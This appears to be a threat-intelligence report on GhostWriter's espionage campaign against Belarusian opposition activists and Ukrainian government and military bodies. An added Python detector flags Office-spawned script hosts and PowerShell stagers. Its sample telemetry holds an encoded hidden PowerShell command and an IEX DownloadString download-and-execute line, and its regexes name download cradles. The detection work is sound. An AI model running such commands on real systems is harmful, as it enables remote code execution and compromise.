Full Report
A suspected Belarusian state-backed hacking group is behind a cyber espionage campaign targeting opposition activists in the country, as well as Ukrainian military and government entities, according to a new report.
Analysis Summary
# Threat Actor: GhostWriter
## Attribution & Identity
* **Identification:** Suspected Belarusian state-backed hacking group.
* **Aliasing/Association:** Linked to the long-running GhostWriter hacking group, which is closely tied to Belarusian state intelligence.
## Activity Summary
* **Recent Campaign (Since mid-2024):** A cyber espionage campaign targeting Belarusian opposition activists, as well as Ukrainian military and government entities.
* **Belarusian Opposition Targeting:** The report describes this as the first documented case of the group directly targeting Belarus's opposition; the timing may be linked to the January presidential election. Decoy documents used against this audience contained the names of political prisoners.
* **Ukrainian Targeting:** Distribution of phishing documents disguised as an anti-corruption initiative action plan for Ukrainian government organizations and a report template related to military supply logistics.
* **Historical Activities:** Previously targeted government, military, and civilian entities in Ukraine and Europe. In 2023 the group deployed PicassoLoader against Ukrainian government organizations, including an attack on Ukraine's National Defense University, and in June 2023 it attacked Ukraine's Ministry of Defense and a military base.
## Tactics, Techniques & Procedures
* **Initial Access:** Used phishing documents (decoys referencing political prisoners for opposition, corruption/logistics plans for Ukrainian entities).
* **Execution/Delivery:** The phishing documents deliver a modified PicassoLoader. The latest variant carries significant code changes, which the report suggests make the loader cheaper to produce and easier to swap out once a version is exposed.
* **Post-Compromise:** The loader is followed by a set of already-known tools (AgentTesla, Cobalt Strike Beacon, njRAT) for subsequent operations; the source does not detail the handoff between loader and payload.
* **MITRE ATT&CK IDs:** Not specified in the source. The behaviour described corresponds to T1566 (Phishing) followed by T1204.002 (User Execution: Malicious File); this mapping is the editor's, not the report's.
## Targeting
* **Sectors:** Government, Military, Civilian organizations, Political opposition groups/activists.
* **Geography:** Belarus, Ukraine.
* **Victims:** Belarusian opposition activists, Ukrainian military and government entities, Ukraine’s National Defense University, Ukraine’s Ministry of Defense, a military base in Ukraine.
## Tools & Infrastructure
* **Malware Families Used:** PicassoLoader (latest variant modified), AgentTesla, Cobalt Strike Beacon, njRAT.
* **Infrastructure:** Not specifically detailed (no defanged URLs/IPs provided in the source text).
## Implications
* The actor is waging aggressive cyber espionage in line with Belarusian government interests, focusing on both external adversaries (Ukraine) and internal dissent (Belarusian opposition).
* The continued use of established malware families like PicassoLoader, even with modifications, indicates a persistent and resourceful state-aligned cyber espionage unit. The cyber operations continue despite Belarus not actively participating militarily in the war in Ukraine.
## Mitigations
* Implement phishing awareness training that covers documents posing as internal planning material or politically sensitive content. The decoys here were tailored to each audience (political-prisoner names for activists, an anti-corruption action plan and a logistics report template for Ukrainian bodies), so training built around generic "spot the typo" cues is not enough.
* Because the latest PicassoLoader variant was modified, signature matches on older samples cannot be relied on. Prefer behavioural detections at the endpoint (Office applications spawning script hosts or other living-off-the-land binaries, loaders executing from user-writable paths) and block macros and other executable content in documents of internet origin.
* Monitor for Cobalt Strike Beacon, njRAT and AgentTesla activity. All three are commodity or widely shared tooling, so a hit on its own is not attribution; the combination with PicassoLoader and the decoy themes above is what points at GhostWriter.
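The behavioural check suggested above, written out as an added example that is not code from the report or from any GhostWriter sample: it scores process-creation events for an Office application spawning a script host or LOLBin, and for PowerShell command lines that look like a stager. The report does not describe PicassoLoader's execution chain, so the parent/child pairs and command-line patterns here are general assumptions about document-delivered loaders, and the JSON-lines telemetry at the bottom is constructed sample data (Sysmon-style field names), not victim data.

```python
"""Flag document-initiated execution chains in process-creation telemetry.

Added example: the parent/child pairs and command-line patterns are generic
assumptions about document-delivered loaders, not published PicassoLoader
behaviour. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine).
"""
import json
import re

# Parents from which a script host or LOLBin child is rarely legitimate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that document-delivered loaders commonly use to stage the next payload.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
# Command-line patterns typical of a PowerShell stager; input is lower-cased first.
PS_PATTERNS = {
    "encoded command": re.compile(r"-e(nc(odedcommand)?)?\b"),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden"),
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression"),
    "base64 decode": re.compile(r"frombase64string"),
}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: dict) -> tuple:
    """Score one process-creation event: ('high' | 'medium' | 'none', reasons)."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    reasons = []
    office_child = parent in OFFICE_PARENTS and child in LOLBINS
    if office_child:
        reasons.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        hits = [name for name, pat in PS_PATTERNS.items() if pat.search(cmd)]
        if hits:
            reasons.append("powershell stager indicators: " + ", ".join(hits))
    if not reasons:
        return "none", reasons
    # An Office parent is the strongest signal; stager syntax alone is worth a look.
    return ("high" if office_child else "medium"), reasons


def triage(jsonl: str) -> list:
    """Run assess() over JSON-lines telemetry and return only the events worth a look."""
    alerts = []
    for n, line in enumerate(jsonl.strip().splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        severity, reasons = assess(json.loads(line))
        if severity != "none":
            alerts.append({"line": n, "severity": severity, "reasons": reasons})
    return alerts


# Constructed sample telemetry: one benign document open, two document-spawned
# children, one scheduled admin script, one stager launched from explorer.
SAMPLE = r'''
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\u\\Downloads\\Action_Plan.docx\""}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe C:\\Users\\u\\AppData\\Local\\Temp\\stage.dll,Run"}
{"ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')\""}
'''

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

On the sample, lines 2 and 3 score `high` (Word spawning PowerShell and rundll32) and line 5 scores `medium` (a download cradle with no Office parent); the benign document open and the admin script produce nothing. The point of the design is that none of it depends on a PicassoLoader hash: a rebuilt loader still has to leave the document and run something, and that edge is what the rule watches.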